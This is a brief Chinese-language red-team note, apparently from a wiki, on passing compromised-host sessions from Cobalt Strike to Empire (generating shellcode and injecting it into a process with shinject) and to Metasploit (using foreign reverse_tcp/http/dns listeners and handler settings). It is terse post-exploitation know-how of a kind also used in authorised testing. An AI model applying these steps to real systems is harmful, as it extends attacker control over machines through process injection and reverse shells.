跳转至

与msf和empire交互

派生Empire

创建一个Listener
创建一个stager
>usestager windows/shellcode 执行,会生成/tmp/launcher.bin
CS 使用PS命令查找进程,进行进程注入(>shinject 进程id x64),选择launcher.bin即可

派生MSF

使用CS的外部监听器
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
msf开启监听
Set LHOST and LPORT 设置为beacon
Set DisablePayloadHandler to True
Set PrependMigrate to True
exploit -j
cobalt strike会话主机上点击spwan,创建外部监听器,选择windows/foreign/reverse_tcp指定MSF监听的IP和端口即可